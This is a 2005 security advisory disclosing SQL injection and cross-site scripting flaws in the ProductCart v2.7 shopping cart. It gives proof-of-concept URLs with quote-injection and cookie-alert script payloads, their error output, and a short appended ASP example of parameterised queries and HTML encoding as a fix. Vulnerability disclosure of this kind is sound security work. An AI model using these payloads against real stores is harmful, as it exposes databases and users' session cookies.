HSC Research Group - Advisories
Written by Hackers Center
Sunday, 03 April 2005 18:14

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Severity: Medium
Title: Multiple SQL INJECTION and XSS vulnerabilities in ProductCart v2.7
Date: 04/04/2005

Vendor: Early Impact
Vendor Website: http://www.earlyimpact.com
Summary: There are multiple SQL injection and XSS vulnerabilities in ProductCart v2.7.

Information Dcrab's Services: http://www.digitalparadox.org/services.ah

Proof of Concept Exploits:

http://localhost/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory="SQL_ERROR&idSupplier=10&resultCnt=999&keyword=dcrab
SQL ERROR
Type mismatch: "cint"
/productcart/pc/header.asp, line 110

http://localhost/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt="SQL_ERROR&keyword=dcrab
SQL ERROR
Provider error "80020005"
Type mismatch.
/productcart/pc/advSearch_h.asp, line 208

http://localhost/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt=999&keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops Cookie

http://localhost/tarinasworld_butterflyjournal.asp?offset="SQL_INJECTION
SQL ERROR
Microsoft VBScript runtime error "800a000d"
Type mismatch: "offset"
/tarinasworld_butterflyjournal.asp, line 47

http://www.localhost/productcart/pc/NewCust.asp?redirectUrl=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops Cookie

http://www.localhost/storelocator_submit.asp?countrysearch=1&country=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops Cookie

http://www.localhost/productcart/pc/techErr.asp?error=<script>alert(document.cookie)</script>
Pops Cookie

Possible Fixes: The usage of htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the MySQL database, or before echoing data on the screen, would solve these problems.

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author: These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon-to-come-out book on secure coding with PHP.

Diabolic Crab's Security Services: Contact at dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for PHP auditing and web application securing services, along with programming in PHP, VB, ASP, C, C++, Perl, Java, HTML and graphic designing.

-----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQk+spCZV5e8av/DUEQLdAgCfY5hWp9jqmFGMWPa3cMBDZbxhP0EAoK17 rNdnMkIvE+YjlCf2jSpZB85K =wHSO -----END PGP SIGNATURE-----
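
The mitigation described under Possible Fixes, written for classic ASP (VBScript) because the affected pages are .asp scripts; this is an added example, not code from the advisory or from ProductCart. It uses strict integer validation, ADO parameters in place of the string-escaping functions the advisory names, and Server.HTMLEncode on output. The helper SafeInt, the open connection conn, the numeric bounds, and the table and column names are assumptions.

```vbscript
<%
' Added example; SafeInt, conn, the bounds and the SQL names are assumptions.
Const adInteger = 3, adVarChar = 200, adParamInput = 1, adCmdText = 1

' Return the value as a Long in [minVal, maxVal], or defaultVal when the raw
' parameter is anything other than 1 to 9 decimal digits. CLng only ever
' sees all-digit input, so it cannot raise a type mismatch.
Function SafeInt(raw, defaultVal, minVal, maxVal)
    Dim re, s, n
    s = CStr(raw)
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    SafeInt = defaultVal
    If re.Test(s) Then
        n = CLng(s)
        If n >= minVal And n <= maxVal Then SafeInt = n
    End If
End Function

Dim idCategory, resultCnt, keyword, cmd, rs, shown
idCategory = SafeInt(Request.QueryString("idCategory"), 0, 0, 999999999)
resultCnt  = SafeInt(Request.QueryString("resultCnt"), 10, 1, 999)
keyword    = Left(CStr(Request.QueryString("keyword")), 100)

' Values are bound as typed parameters, never concatenated into the SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn        ' conn: an open ADODB.Connection (assumed)
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT description FROM products " & _
                  "WHERE idCategory = ? AND description LIKE ?"
cmd.Parameters.Append cmd.CreateParameter("cat", adInteger, adParamInput, , idCategory)
cmd.Parameters.Append cmd.CreateParameter("kw", adVarChar, adParamInput, 102, "%" & keyword & "%")
Set rs = cmd.Execute

' Everything echoed into the page is HTML-encoded at output time, whether it
' came from the query string or from the database.
Response.Write "<p>Results for: " & Server.HTMLEncode(keyword) & "</p><ul>"
shown = 0
Do While Not rs.EOF And shown < resultCnt
    Response.Write "<li>" & Server.HTMLEncode(rs("description") & "") & "</li>"
    rs.MoveNext
    shown = shown + 1
Loop
Response.Write "</ul>"
%>
```

The same two rules cover the other parameters listed above: offset is handled as a number, while redirectUrl, country and error are text that is encoded before it is written back.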